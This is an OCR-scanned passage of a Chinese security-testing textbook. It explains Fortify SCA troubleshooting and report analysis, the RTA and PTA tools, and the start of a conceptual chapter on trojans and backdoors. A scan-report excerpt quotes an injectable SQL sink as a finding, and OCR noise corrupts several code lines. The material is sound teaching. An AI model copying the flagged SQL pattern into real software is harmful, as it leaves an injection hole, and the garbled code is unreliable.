后 选择 Why is this issue hidden? (这 个 问题 为 何 隐藏 ”)，Filters (过 滤器 ) 选 项 卡 上 会 突出 显示 
Visibility Filter (可 见 性 过 滤器 )。 
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E Project Summary | I] Leservjova 


Summary | Certficaticn | ld information [Analysis Information | 


SCA Engine Version: 5.0.0.0240 
Platform: 
Machine Name: 


Username: pworson 
Code Scanned in: 00:05 


Rulepacks | Properties |c 
[1380] Rule *11F4897! 


M8-5078-CSZES295DC7E": Syntax error. 


图 5-49 扫描 信息 


57.7 ”故障 排除 与 支持 


1. 故障 排除 


1) 利用 日 志文 件 进行 故障 排除 

如 果 遇 到 运行 时 错误 ， 请 查看 日 志文 件 以 获取 相关 信息 。 

* 有 关 Fortify 的 错误 ， 请 参见 <fortify_data_directory>/awb/log/awb.log 

* 有 关 Eclipse 的 错误 ， 请 参见 <fortify_data_directory>/awb/.metadata/.log 

其 中 : 

e 在 UNIX 平台 上 ，<fortify_data_directory> 是 指 目录 ~/fortify。 

* 在 Windows 平台 上 ，<fortify_data_directory> 是 指 Documents and Settings 下 特定 用 户 
目录 下 的 Local Settings/Application Data/Fortify。 

2) org.eclipse.swt.SWTError 错误 消息 

TE UNIX 系统 上 ，Audit Workbench 可 能 无 法 启动 ， 并 会 显示 下 列 错 误 : 


org.eclipse.swt.SWTError: No more handles [gtk init check() failed] 


如 果 看 到 这 个 错误 ， 则 请 确保 X11 的 配置 正确 无 误 ， 而 且 已 经 设置 了 DISPLAY 变量 。 

3) 内 存 不 足 错误 

如 果 遇 到 内 存 不 足 的 错误 ， 而 且 使 用 的 不 是 Macintosh OS X 平台 ， 可 设置 
AWB VM OPTS 环境 变量 来 配置 更 大 的 堆 大 小 。 

例如 ， 要 为 Audit Workbench 分 配 700 MB， 则 将 该 变量 设置 为 -Xmx700M。 当 指定 该 
选项 时 ， 确 保 分 配 的 内 存 未 超过 可 用 的 物理 内 存 ， 否 则 会 降低 效能 。 

作为 一 项 指导 原则 ， 假 设 没 有 执行 其 他 内 存 密集 型 进程 ， 分 配 的 内 存 不 应 超过 系统 可 用 
内 存 的 2/3. 
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如 果 使 用 的 是 Macintosh OS X， 请 编辑 下 列 文件 ， 将 -Xmx500m 参数 改 为 -Xmx700m 或 
更 高 : 


«install directory»/Auditworkbench.app/contents/MacOS/eclipse.ini 


bid 


如 果 超 过 JVM 在 以 下 平台 上 强制 执行 的 限制 ， 则 Audit Workbench 可 能 无 法 加 载 ， 并 
显示 错误 : JVM terminated Exit code-1 。 

Linux 2.4 - 1800 MB 

Linux 2.6 - 2650 MB 

Windows 2000 - 1500 MB 

Windows 2003 - 1500 MB 

Windows XP - 1250 MB 

Mac OS X - 1800 MB 

AIX 5.2 - 无 限制 

Solaris 8 - 1800 MB 


4) 重 置 默认 视图 

如 果 曾 经 关闭 或 者 移动 过 面板 ， 如 Issues (问题 ) 面 板 或 Summary (摘要 ) 面 板 ， 则 可 以 在 
Options (选项 ) 菜 单 中 选择 Reset Default Views ( 重 置 默认 视图 )， 即 可 将 用 户 界 面 重 置 回 原始 
的 默认 状态 。 

2. 报告 错误 和 请 求 增强 功能 


用 户 反 馈 在 产品 的 成 功 过 程 中 必 不 可 少 。 要 请 求 增强 功能 、 补 丁 ， 或 者 报告 错误 ， 请 发 
送 电 子 邮 件 到 技术 支持 中 心 : 


techsupport@fortify.com 


请 务必 在 电子 邮件 主体 中 包含 下 列 信息 : 

产品 : Audit Workbench 

版 本 号 : 要 确定 版 本 号 ， 请 在 Audit Workbench 界面 上 选择 Help( 帮 助 )， 然 后 选择 About 
Audit Workbench( 关 于 Audit Workbench). 

平台 : (例如 PC) 

操作 系统 : (例如 Windows 2000) 

当 请 求 增强 功能 时 ， 请 包含 有 关 增 强 功 能 的 描述 。 

当 报告 错误 时 ， 请 提供 足够 的 详细 信息 ， 以 便 最 大 限度 地 重 现 该 问题 。 描 述 得 越 详细 ， 
技术 支持 部 门 就 能 越 快 地 分 析 并 修复 该 问题 。 同 时 要 包含 从 发 生 该 问题 时 开始 记录 的 日 志文 
件 (或 其 中 的 相关 部 分 )， 以 及 对 该 问题 严重 程度 的 评价 : 

e 阻 断 性 的 

。 致命 性 的 
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5.8 Fortify SCA 安全 报告 分 析 


5.8.1 导出 Fortify SCA 报告 


Fortify SCA Report 如 图 5-50 所 示 。 


File Edi Tool Options Help 


Summary | Audit Guide | Scan | Reports 


Critical (40) Hidden (0) 


图 5-50 Fortify SCA Report 


单 击 图 5-50 中 的 Reports 按钮 , 打开 Generate Report 窗口 ,报告 默认 选项 如 图 5-51 所 示 : 


|) Generate Report... Lbs 


| Report: [Fortify Security Report. ~) [Visibility Settings | 
[V] Executive Summary Executive Summary 

加 Project Summary [V] Issues Overview. 

[V] Results Outline This section provides an overview of the issues uncovered. 

四 Detailed Project Summary during analysis. The report covers a summary of vulnerability 

E 

E 


categories discovered by the tool. The auditor should augment 
E] issue Count by Category this section with higher-level conclusions derived from human 
V] Issue Breakdown by Analysis review of the application (including architecture reviews, 

[7] New Issues black-box testing, compliance issues, etc.) 

» Edit Tet 


[V] Issue Summary by Fortify Priority Order 

Select the attributes that the chart will be based on 

Fortify Priority Order ~ X (Number of Issues) 
[| Refine Issues in Subsection (513 Issues Showing) 

[| Advanced... 

I © Table O Pie © Bar 


Recommendations and Conclusions 

This section gives some high-level recommendations on 
remediating the issues discussed in the Issues Summary sub 
section. Recommendations will vary based on deployment 
scenarios, risk appetite, and existing mitigating strategies. The 
auditor should supplement the Fortify 

recommendations with specific information that takes into 
account the application specific variables. 

> Edit Tet 


Seve Settings as Default. 


Seve as New Template... 


图 5-51 Generate Report 默认 选项 


选择 Save Report， 弹 出 保存 对 话 框 ， 内 容 如 图 5-52 所 示 : 
可 以 根据 需要 设置 保存 文件 名 、 导 出 者 、 脚 注 、 保 存 路 径 、 保 存 格式 。 设 置 完成 后 ， 单 
击 Save 按钮 进行 保存 。 
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JE) Save Report -. Xo 
Title Fortify Security Report 
Author: hope-pact 


Footnote: — Copyright 2013 Fortify Software Inc. 


Location: CAUsers hope pact'AppData Local FortiAAWE | Browse ... 
Format: PDF Report T 


Cancel 


图 5-52 保存 分 析 报 告 


5.8.2 Fortify SCA 安全 报告 分 析 


本 小 节 ， 我 们 以 上 节 中 导出 的 报告 为 例 ， 对 报告 的 组 成 结构 和 内 容 进行 分 析 。 

从 图 5-51 中 ，Fortify SCA 报告 在 结构 上 分 为 ，Executive Summary( 执 行 摘要 )、Project 
Summary( 项 目 概要 )、Results Outline (结果 概述 )、Issue Count by Category( 按 照 类 别 划分 的 问 
题 统 计 )、Issue Breakdown by Analysis( 按 照 分 析 对 问题 的 划分 )。 下 面 我 们 将 对 上 述 模块 中 的 
内 容 进 行 曾 述 。 

1. Executive Summary: 该 部 分 的 内 容 包 括 三 大 部 分 , Issues Overview( 问 题 概述 )、Issues by 
Fortify Priority Order( 按 照 fortify 定义 的 问题 优先 级 )，Recommendations and Conclusions( 建 议 
和 结论 )。 如 图 5-53 所 示 。 


Executive Summary 
Issues Overview 
On Jan 6, 2015, a source code review was performed over the HotelRoomManage code base. 165 files, 11,842 LOC (Executable) 


vere scanned and reviewed for defects that could lead to potential secunty vulnerabilities A total of 513 reviewed finding: were 
uncovered during the analysis 


The Issues Category section provides Fortify recommendations for addressing issues at a generic level. The recommendations for 
specific fixes can be extrapolated fom those genenc recommendations by the development group. 


图 5-53 Executive Summary 内 容 组 成 


a) Issues Overview: 主要 说 明 此 次 扫描 中 的 扫描 日 期 、 扫 描 文件 数 以 及 其 他 一 些 相关 
信息 。 

b) Issues by Fortify Priority Order: 主要 说 明 按照 fortify 的 问题 等 级 划分 ， 每 个 等 级 的 问 
题 共 有 多 少 个 。 

c) Recommendations and Conclusions: 主要 说 明 针 对 此 次 扫描 给 出 的 建议 和 结论 。 
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2. Project Summary: 该 部 分 的 内 容 包 括 六 大 部 分 ，Code Base Summary( 代 码 摘要 )、Scan 
Information( 扫 描 信息 )、Results Certification( 结 果 证 明 )、Attack Surface( 攻 击 面 )、Filter Set 
Summary( 过 滤 设 置 摘 要 )、Audit Guide Summary( 审 计 指 南 摘要 )。 如 图 5-54 所 示 。 

Project Summary 


Results Signature: 


Filter Set Summary 


Current Enabled Filter Set: 


Filter Set Detail: 


Audit Guide Summary 
图 5-54 Project Summary 内 容 组 成 
a) Code Base Summary: 主要 说 明 此 次 扫描 的 代码 属于 哪个 项 目 或 文件 、 文 件 总 数 、 代 
码 总 行 数 等 信息 。 
b) Scan Information: 主要 说 明 扫描 时 间 、SCA 版 本 信息 、 执 行 扫描 的 PC 信息 、 扫 描 时 
所 使 用 的 用 户 名 。 
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c) Results Certification: 关于 扫描 的 证 明 信 息 ， 证 明 扫 描 的 正确 性 、 有 效 性 等 。 
d) Attack Surface: 主要 说 明 此 次 扫描 涉及 的 命令 行 参数 、 私 人 信息 、 系 统 信息 。 
e) Filter Set Summary: 说 明 此 次 扫描 过 程 中 使 用 的 扫描 过 滤 规则 配置 ， 例 如 ， 按 照 这 些 


规则 对 被 扫描 的 文件 夹 进行 优先 级 设置 等 。 


f) Audit Guide Summary: 如 果 启 用 该 功能 ， 则 会 说 明 关 于 审计 指南 的 一 些 信息 。 
3. Results Outline: 该 部 分 内 容 主要 是 对 此 次 扫描 中 发 现 的 漏洞 进行 分 析 。 如 图 5-55 


所 示 : 


Results Outline 


The scan found 513 issues. 


Without proper ncn control, executing 3 SQL statement that contam: 3 user-controlled primary key can allow an attacker to 
unauthorized record: 


[Databaze acces: control error: occur when 
1 Data enter: a program from an untrusted source 
[2. The data is used to specify tbe value of a primary key in a SQL query. 


[Example 1: The following code uses a parameterized stas which escapes metacharacter: and prevent: SQL injection. 
|vulnerabilite:. to constract and execute a SQL. dor seanchas fr an mp marcis g de specified identifier [1]. The. 
andar kkr pai Ti acea wi autbeztcated e 


hd = Integer decode(reque:t getParameterC'invoiceID^). 
[String query = "SELECT * FROM invoice; WHERE id = 7" 
[PreparedStxtement stmt = conn prepareStatement(query). 
stmt. setine, id); 

[ResultSet rezult: = stmt executeO. 
And bere i: an Android equivalent 


[PasswordAuthenncanon pa = authenticator getPasswordAutbenneanonl): 
String userName = pa getUserName0: 

[Sting id = this getlatent0).petExtras0.petSmiagl invoicelD"); 
[String query = "SELECT * FROM invoices WHERE id = ? AND user = ?"; 
SQLiteDatabase db = this openOrCreateDatabase DB", MODE, PRIVATE, null); 
[Cursor ¢ = db.rawQueryiquery, new Object[] (id, userName)); 


KI 5-55 Results Outline 内 容 组 成 


如 图 5-55 所 示 ，Overall number of results 说 明 此 次 扫描 发 现 的 问题 总 数 ，Vulnerability 


Examples by Category( 依 据 类 别 漏洞 举例 )， 针 对 此 次 发 现 的 漏洞 类 型 ， 举 出 例子 做 出 说 明 。 


比如 图 中 “Category: Access Control: Database (23 Issues)”， 说 明 此 次 关于 “访问 控制 ”的 类 别 


g 


P, X AGEE” 23 个 。 然 后 图 中 的 图 示 部 分 从 不 同 角度 指出 这 23 个 问题 中 处 


于 不 同 状态 的 占 多 少 个 。“Abstract ”对 访问 控制 类 别 的 漏洞 进行 简 述 ;“Explanation: ”对 访 
问 控制 类 别 的 漏洞 进行 详细 分 析 ， 给 出 “recommendation( 建 议 )” 并 且 举 出 了 两 个 实例 ; 
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examplel, example2. 
报告 中 , 接着 图 5-55 信息 部 分 的 是 此 次 发 现 关 于 访问 控制 类 别 中 关于 数据 库 漏 洞 的 具体 
描述 ， 如 图 5-56 所 示 : 


BaseDAO java, line 35 (Access Control: Database) 


Folder High 


Without proper access control, the method exeSql() in BaseDAO java can execute a 
SQL statement on line 35 that contains an attacker-controlled primary key, thereby 
allowing the attacker to access unauthorized records. 

Source: DelLogServlet java:61 javax servlet ServletRequest getParameter() 

s9 response. setContent Type (*application/json;charset - uft-8*]; 

leo PrintWriter out ~ response.getMriter(); 

[e 

E2 String[] root ~ loglds.split(*,"]); 

a LogDAO logDao - new LogDAO(); 

Sink: BaseDAO java:35 java.sql. Statement.executeUpdate() 

n public void exegql (String aql) { 

n enl 

as at executeUpdate (aq1) ; 

lae lst.closel); 

Jeatch(Rxception e){ 


图 5-56 Results Outline 内 容 组 成 ( 续 ) 


图 5-56 中 给 出 了 发 现 漏洞 的 文件 名 称 “BaseDAO.java”, 位 于 代码 中 的 第 几 行 (“line 35") 
类 别 及 漏洞 “Access Control: Database”， 最 后 还 会 具体 给 出 有 问题 的 代码 。 

4. Issue Count by Category: 详细 列 出 了 此 次 扫描 中 各 类 别 及 相关 漏洞 的 信息 。 如 图 5-57 
所 示 : 


Issue Count by Category 


Issues by C: 
|Poor ing Practice: Use of a Stream. 119 
|Cross-Site Request Forgery 57 
JavaScript Hijacking: Ad Hoc Ajax 55 
[System Information Leak: Incomplete Servlet Error Handling 53 
[System Information Leak |46 
|Access Control: Database. 40 
[Denial of Service: Parse Double |20 
[SQL Injection 19 
[System Information Leak: HTML Comment in JSP 15 
|Cross-Site Scripting- Persistent 12 
[JavaScript Hijacking: Vulnerable Framework: 42 
|Code Correctness- Erroneous String Compare 10 
[Missing Check against Null 40 
[Poor Error Handling: Overly Broad Catch. 10 


ic Code Evaluation: Code Injection 
|Cross-Site Scripting- Reflected 
Redundant Null Check 
(Trust Boundary Violation 
[Password Management: Hardcoded Password 
Code Correctness: Erroneous finalize() Method 
[Dead Code: Expression is Always true 
[Dead Code: Unused Field 
Insecure Randomness 
J2EE Bad Practices: getConnection() 
||2EE Bad Practices: Leftover Debug Code 
||2EE Misconfiguration: Excessive Session Timeout 
[Obsolete 
[Password Management: Insecure Submission 
[Password Management: Null Password 
[Password Manasement- Password in Comment 


图 5-57 Issue Count by Category 内 容 组 成 


xEqsmEBmBImPRIPBImÍPII [PII] [[o 


5. Issue Breakdown by Analysis: 此 次 扫描 结果 的 饼 状 图 分 析 结 果 。 


*230* 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


关于 分 析 报 告 的 内 容 除了 上 述 默认 配置 下 的 5 个 模块 以 外 还 有 “Detailed Project 
Summary”， 项 目 信息 的 详细 描述 ;“New Issues”， 在 报告 中 以 饼 状 图 显示 依据 “New Issues" 
规则 发 现 新 间 题 的 比例 ， 如 图 5-58 所 示 : 


Issues by New Issue 


[Tue following issue have been discovered since the last scan 


图 5-58 New Issues 图 例 


5.9 HP Fortify 实时 安全 分 析 器 的 主要 特征 


5.9.1 Fortify RTA 概述 


Fortify RTA 是 Fortify 公司 独 有 的 在 软件 运行 时 进行 安全 防护 的 软件 。 它 可 以 理解 为 “ 软 
的 IPS”， 提 供 对 Web 应 用 系统 运行 时 刻 的 
防护 和 监控 功能 ,RTA 的 独特 之 处 是 它 仅仅 
是 一 堆 代 码 ， 通 过 静态 插 桩 方式 与 Web 应 
用 系统 的 二 进 制 代码 结合 后 , 就 可 以 在 Web 
应 用 系统 内 部 工作 。 实 时 地 了 解 、 跟 踪 并 分 
析 Web 应 用 系统 的 运行 状况 ， 当 有 恶意 攻 
击 数据 进入 系统 时 , 它 会 及 时 地 阻止 攻击 发 
生 ,， 为 应 用 系统 提供 及 时 的 防护 ; 同时 ， 它 
会 把 所 有 关于 攻击 的 信息 详细 地 记录 下 来 ， 
发 送 至 控制 台 ， 从 攻击 的 When. What. 
Where、How 以 及 Who 等 方面 ， 多 维度 报 
告 攻击 行为 的 信息 , 让 运 维 人 员 或 者 安全 管 图 5-59 Fortify RTA 工作 原理 图 


Fortify RTA — 工作 原理 图 
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理 人 员 及 时 地 了 解 上 线 的 应 用 系统 在 生产 过 程 中 遭受 到 的 黑客 攻击 ， 以 及 应 用 系统 自身 所 存 
在 的 安全 漏洞 等 相关 技术 的 详细 数据 和 信息 。 它 使 得 软件 主动 防御 黑客 成 为 可 能 。 图 5-59 显 
示 了 工作 原理 图 。 


5.9.2 Fortify RTA 的 工作 原理 


“Fortify RTA， 它 通过 对 Web 应 用 系统 的 每 个 DNA 注入 安全 因子 来 增强 应 用 系统 自身 
的 防 攻 击 能 力 ” 这 是 OWASP 组 织 创始 人 Mark Curphey 给 出 的 形象 化 描述 。 正 如 Mark 
Curphey 所 说 ，Fortify RTA 是 根据 AOP 一 一 “面向 切面 编程 ”的 原理 ， 通 过 对 Web 应 用 系统 
的 可 执行 代码 (不 需要 源 代码 ) 进 行 静 态 分 析 ， 找 出 所 有 的 输入 点 (Input) 和 输出 点 (Output)， 插 
入 安全 切面 ， 即 Fortify RTA 的 安全 防御 机 制 。 因 此 Fortify RTA 的 安全 检测 机 制 就 结合 到 了 
应 用 系统 内 部 中 , 与 应 用 系统 的 执行 代码 成 为 一 体 , 就 如 同 RTA 是 一 剂 安全 防御 疫苗 被 注入 
到 了 应 用 系统 中 。 从 应 用 系统 内 部 形成 防护 网 。 这样 一 来 ， 当 结合 了 RTA 的 应 用 系统 在 生产 
环境 上 受到 黑客 攻击 时 ， 系 统 中 的 RTA 就 可 以 及 时 地 对 其 进行 防御 了 。 
5.9.3 Fortify RTA 控制 台 

Fortify RTA 的 功能 之 二 就 是 可 以 把 应 用 系统 遭受 的 攻击 的 详细 技术 信息 记录 并 报告 出 
来 ， 方 便 系统 运 维 人 员 或 安全 管理 人 员 及 时 地 了 解 生产 环境 上 的 应 用 系统 的 安全 状况 。 如 图 
5-60 所 示 ， 报 告 从 When, What, Where, How 以 及 Who 等 多 维度 地 呈现 ， 便 于 相关 人 员 及 
时 制订 应 对 策略 。 
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图 5-60 Fortify RTA 报告 控制 台 


5.9.4 Fortify RTA 能 够 防御 的 攻击 种 类 
Fortify RTA 能 防御 目前 所 有 黑客 常用 的 、 危 害 较 大 的 十 几 种 攻击 方式 ， 具 体 如 下 : 
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Cross-SiteScripting/Cross-SiteScripting:PoorValidation 
HTTPResponseSplitting 
PoorErrorHandling:UnhandledException 
PrivacyViolationGeneric 
SQLInjection/SQLInjection:Hibernate/NHibernate 
SessionFixation 
PrivacyViolation:CreditCard/SocialSecurityNumber 
CreditCardFraud 

CrossSiteRequestForgery 

DecoyTampering 

ForcefulBrowsing 

LinkSpam(Reflected&Persistent) 
Probing/Probing:BrokenLink/CommandInjection/Worm 
SystemInformationLeakage 


5.9.5 Fortify RTA 应 用 的 平台 


语言 J2SE 1.4 或 更 新 版 本 ，J2EE 1.3.1 或 更 新 版 本 ， NET1.1 和 2.0 

操作 系统 : Windows 2K, 2003, XP; Linux RH9, ES 3.0, Fedora; Mac OS X; Solaris 8 和 9 

应 用 服务 器 : Tomcat 4.X,5.X, 6.X; Weblogic 8.x.9.X: Jboss, Websphere 6.0, IIS 

Web 浏览 器 : Linux 和 Solaris Mozilla 1.7 或 更 新 版 本 ; Firefox 1.0 或 更 新 版 本 ; Windows 
IE 6, Firefox 1.0 或 更 新 版 本 ，Macintosh Firefox 1.0 或 更 新 版 本 


5.10 HP Fortify 程序 跟踪 分 析 器 (PTA) 


5.10.1 Fortify PTA 概述 


Fortify PTA 是 Fortify Software 公司 最 新 推出 的 软件 安全 动态 测试 工具 。 它 可 以 帮助 软件 
功能 测试 人 员 (QA 人 员 ) 在 不 需要 任何 黑客 渗透 测试 技术 的 情况 下 , 对 B/S 应 用 系统 进行 动态 
的 安全 性 测试 。Fortify PTA 利用 动态 污染 传播 方法 (Dynamic Taint Propagation) 对 测试 人 员 输 
入 的 测试 数据 进行 跟踪 ， 分 析 数 据 在 程序 中 的 传递 和 执行 情况 ， 从 中 分 析 程序 中 潜在 的 安全 
漏洞 ， 帮 助 功能 测试 人 员 报告 安全 测试 结果 ， 整 个 过 程 自动 完成 ， 功 能 测试 人 员 只 需要 做 常 
规 的 功能 测试 即 可 。 解 决 了 安全 渗透 测试 人 员 和 功能 测试 人 员 缺 乏 黑 客 知识 的 难题 。 


5.10.2 ”Fortify PTA 工作 原理 


Fortify PTA 利用 动态 污染 传播 方法 的 特点 ， 首 先 对 软件 的 二 进 制 代码 进行 插 桩 分 析 ， 找 
出 所 有 Source, Sink 代码 ， 建 立 检测 机 制 。 然 后 对 程序 进行 常规 的 功能 测试 。 测 试 过 程 不 需 
要 测试 人 员 输 入 任何 带 攻击 性 的 测试 数据 ，Fortify PTA 会 根据 功能 测试 自动 找 出 软件 中 所 有 
可 能 因 外 部 输入 数据 而 造成 的 安全 问题 ， 并 根据 漏洞 清晰 地 报告 出 来 。 如 图 5-61 所 示 。 
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图 5-61 Fortify PTA 工作 原理 图 


5.10.3 Fortify PTA 特点 


总 结 Fortify PTA 的 主要 特点 有 : 

1) 不 需要 特殊 的 攻击 性 测试 数据 , 让 QA 人 员 都 可 以 做 安全 测试 。 解决 测试 缺乏 安全 知 
识 、 攻 击 知识 的 难题 。 

2) 由 于 直接 跟踪 外 部 输入 数据 ， 所 以 能 够 很 真实 、 有 效 地 找 出 系统 中 最 严重 、 最 关键 的 
安全 问题 。 

3) 与 功能 并 行 ， 速 度 快 ， 效 率 高 ,很 容易 与 现 有 测试 流程 结合 。 同 时 利用 功能 测试 覆盖 
率 高 的 优点 ， 大 大 提高 了 动态 安全 测试 的 覆盖 率 。 

4) 如 图 5-62 所 示 ，Fortify PTA 根据 漏洞 类 别 清晰 地 报告 出 来 , 单 击 报 出 的 每 一 个 漏洞 ， 
Fortify PTA 可 以 给 出 该 漏洞 在 什么 地 方 产生 的 ， 它 的 Source 和 Sink 分 别 在 哪里 等 清晰 而 又 


详细 的 报告 。 
Events File: [ Brows 
Ometn Clear | Pase _New Run | EpottoFoniy moot Eni Fiel dene 
Name:Random Status: In Progress 
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Ali Entry Points(3/5) [n 40.0% Miss 
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All End Points(4/6) r d xd 33.3% Miss 


图 5-62 Fortify PTA 安全 测试 报告 


*234* 软件 安全 测试 及 工具 应 用 (第 2 版 ) 
5.10.4 Fortify PTA 可 以 分 析 和 防御 的 安全 漏洞 种 类 


SQL Injection 

Cross-Site Scripting: Reflective 
Cross-Site Scripting: Persistent 
Command Injection 

Arbitrary URL Redirection 

Path Manipulation 

HTTP Response Splitting 

Unhandled Exception 

Privacy Violation: Social Security Number 
Privacy Violation: Credit Card Number 
Log Forging 

Xpath Injection 

LDAP Injection 

Private data being stolen 

Security leaks 

Fraudulent behavior 

Web site defacement 

Phishing attacks 

Escalation of privileges 


5.10.5 Fortify PTA 应 用 的 平台 


语言 : J2SE 1.4 或 更 新 版 本 ，J2EE 1.3.1 或 更 新 版 本 ，NET1.1 和 2.0 

操作 系统 ， Windows 2K, 2003, XP; Linux RH9, ES 3.0, Fedora; Mac OS X Solaris 8 fill 9 

应 用 服务 器 Tomcat 4.X, 5.X, 6.X; Weblogic 8.x, 9.X; Jboss, Websphere 6.0, IIS 

Web 浏览 器 : Linux 和 Solaris Mozilla 1.7 或 更 新 版 本 ; Firefox 1.0 或 更 新 版 本 ，Windows 
IE 6, Firefox 1.0 或 更 新 版 本 ，Macintosh Firefox 1.0 或 更 新 版 本 


5.11 本 章 小 结 


本 章 介绍 了 HP Fortify 的 三 大 分 析 器 , 其 中 主要 讲述 了 静态 代码 分 析 器 (Fortify SCA), 包 
括 主要 特征 、 不 同系 统 下 的 安装 特点 、 分 析 原理 、 分 析 过 程 、 代 码 扫描 方式 、 转 换 源 代码 和 
Audit Workbench 工具 的 使 用 , 深入 讨论 了 静态 代码 分 析 器 5 大 分 析 引 擎 ,介绍 安全 漏洞 扫描 
机 制 并 对 扫描 结果 进行 分 析 。 以 上 所 述 也 充分 体现 了 SCA 代码 分 析 和 对 扫描 结果 进行 处 理 的 
强大 功能 。 

男 外， 本 章 还 对 实时 安全 分 析 器 (RTA) 和 程序 跟踪 分 析 器 (PTA) 进 行 了 简要 介绍 ， 包 括 工 
作 原 理 、 控 制 台 情 况 、 防 御 攻 击 种 类 以 及 各 自 应 用 的 平台 。 可 通过 了 解 两 个 分 析 器 的 实际 
途 和 发 展 状况 ， 来 保障 企业 或 个 人 信息 的 安全 。 
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本 章 导读 

软件 攻击 的 传统 方式 及 领域 是 每 一 位 从 事 安 全 测试 工作 人 员 必 备 的 知识 。 通 过 本 章 的 学 
习 ， 我 们 可 以 系统 地 了 解 攻击 者 常用 的 攻击 技术 ， 如 何 选择 有 效 的 攻击 目标 ; 同时 还 可 以 党 
握 传统 攻击 领域 内 的 技术 实现 ， 为 更 好 地 从 事 安 全 测试 工作 打下 良好 的 理论 基础 。 

应 掌握 的 知识 要 点 : 

e 木马 和 后 门 

e 计算 机 病毒 的 工作 原理 

e 计算 机 病毒 的 检测 与 防范 

e 口令 攻击 

e 数据 库 攻击 

e ”网络 安 全 扫描 

© Web 系统 概述 

e 数据 库 的 概念 

e 数据 库 类 型 

e ”数据库 攻击 

e 如 何 保护 数据 库 

从 本 章 开 始 ， 本 书 将 从 动态 测试 的 角度 对 软件 应 用 安全 进行 分 析 。 在 开始 讨论 动态 测试 
之 前 ， 我 们 先 了 解 一 下 软件 攻击 的 传统 方式 及 常见 的 攻击 领域 ， 然 后 在 后 续 的 章节 中 我 们 着 
重 讨论 动态 测试 的 理论 、 技 术 以 及 工具 的 应 用 。 


61 木马 和 后 门 


6.1.1. 木马 和 后 门 的 区 别 


木马 (Trojan), 也 称 木马 病毒 ， 是 指 通 过 特定 的 程序 (木马 程序 ) 来 控制 另 一 台 计 算 机 。 木 马 通 
常 有 两 个 可 执行 程序 : 一 个 是 控制 端 ， 另 一 个 是 被 控制 端 。“ 木 马 ”程序 是 目前 比较 流行 的 病毒 
文件 ， 与 一 般 的 病毒 不 同 ， 它 不 会 自我 繁殖 ， 也 并 不 “刻意 ”地 去 感染 其 他 文件 ， 它 通过 将 自身 
伪装 吸引 用 户 下 载 执行 ， 向 施 种 木马 者 提供 打开 被 种 主机 的 门户 ， 使 施 种 者 可 以 任意 毁坏 、 窃 取 
被 种 者 的 文件 ， 甚 至 远程 操控 被 种 主机 。 木 马 病毒 的 产生 严重 危害 着 现代 网 络 的 安全 运行 。 
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后 门 一 般 是 指 那些 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 程序 方法 。 在 软件 的 开 
发 阶段 ， 程 序 员 常 常会 在 软件 内 创建 后 门 程序 以 便 可 以 修改 程序 设计 中 的 缺陷 。 但 是 ， 如 果 
这 些 后 门 被 其 他 人 知道 ， 或 是 在 发 布 软件 之 前 没有 删除 后 门 程序 ， 那 么 它 就 成 了 安全 风险 ， 
容易 被 攻击 者 当成 漏洞 进行 攻击 。 

“木马 ”与 “后 门 ”之 间 既 有 联系 又 有 区 别 : 

a) 联系 在 于 ， 它 们 都 是 隐藏 在 用 户 系统 中 向 外 发 送信 息 , 而 且 本 身 具 有 一 定 权 限 , 以 
便 远 程 机 器 对 本 机 的 控制 ; 

b) 区 别 在 于 ， 木 马 是 一 个 完整 的 软件 ， 木 马 的 设计 者 为 了 防止 木马 被 发 现 ， 而 采用 
多 种 手段 隐藏 木马。 木马 的 服务 一 旦 运行 并 被 控制 端 连 接 ， 其 控制 端 将 享有 服务 端的 大 
部 分 操作 权限 。 后 门 通常 是 程序 设计 者 为 了 能 在 日 后 随意 进入 系统 而 设置 的 ， 它 不 仅 绕 
过 系统 已 有 的 安全 设置 ， 而 且 还 能 挫败 系统 上 各 种 增强 的 安全 设置 。 


6.12 木马 与 后 门 的 分 类 


木马 按照 应 用 的 不 同 可 以 分 为 五 大 类 型 : 

1. 远程 控制 木马 : 攻击 者 可 以 通过 该 类 型 的 木马 连接 被 控制 端 获 得 管理 权限 ， 进 行 系统 
访问 ， 窃 取 系统 资源 。 该 类 型 的 木马 是 数量 最 多 、 和 危害 最 大 、 传 播 最 广 的 一 种 木马 。 例 如 ， 
冰河 、 灰 鸽子 等 都 属于 远程 控制 木马 。 

2. 记录 型 木马 :该 类 型 的 木马 将 被 控制 端的 所 有 操作 记录 下 来 并 发 送 给 控制 端 。 例 如 ， 
键盘 记录 木马 会 将 所 有 键盘 操作 记录 下 来 ， 并 悄悄 发 送 给 控制 端 ， 使 攻击 者 获得 个 人 账号 、 
密码 等 敏感 信息 。 

3. 反弹 端口 型 木马 ， 通 常情 况 下 ， 用 户 都 会 通过 防火 墙 来 加 强 计算 机 安全 。 防 火 墙 对 
于 连 入 的 链接 都 会 进行 严格 的 过 滤 ， 但 是 对 于 外 出 的 链接 却 会 疏 于 防范 。 反 弹 端 口 型 木马 就 
是 利用 这 一 特点 ， 令 服务 端 (被 控制 端 ) 使 用 主动 端口 ， 控 制 端 使 用 被 动 端口 。 木 马 会 在 被 控 
制 端 进 行 实时 监控 ， 一 旦 发 现 控制 端 上 线 ， 就 会 主动 弹出 被 控制 端的 主动 端口 与 控制 端的 被 
动 端口 进行 连接 。 

4. 代理 类 木马 ， 感染 代理 类 木马 后 ， 会 在 本 机 开启 HITP、SOCKS 等 代理 服务 功能 。 攻 
击 者 把 受 感染 计算 机 作为 跳板 , 以 被 感染 用 户 的 身份 进行 攻击 者 活动 , 达到 隐藏 自己 的 目的 。 

5. 分 布 式 攻击 木马 ， 最 基本 的 分 布 式 攻 击 就 是 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 
资源 ， 从 而 是 服务 器 无 法 响应 合理 的 服务 请 求 。 很 多 感染 此 类 木马 的 被 控制 端 可 以 作为 攻击 
源 一 起 对 某 台 服务 器 实施 攻击 ， 造 成 服务 器 瘫痪 。 

后 门 往往 是 开发 人 员 在 开发 阶段 建立 的 ， 因 此 我 们 从 技术 角度 将 后 门 分 为 以 下 几 类 : 

1. 网 页 后 门 : 一 般 都 是 服务 器 上 正常 的 Web 服务 来 构造 自己 的 连接 方式 ， 比 如 非常 流 
行 的 ASP、cgi 脚 本 后 门 等 。 

2. 线程 插入 后 门 : 此 类 后 门 是 利用 系统 自身 的 某 个 服务 或 者 线程 ， 将 后 门 程序 插入 到 
其 中 ， 是 现在 最 流行 的 一 个 后 门 技术 。 

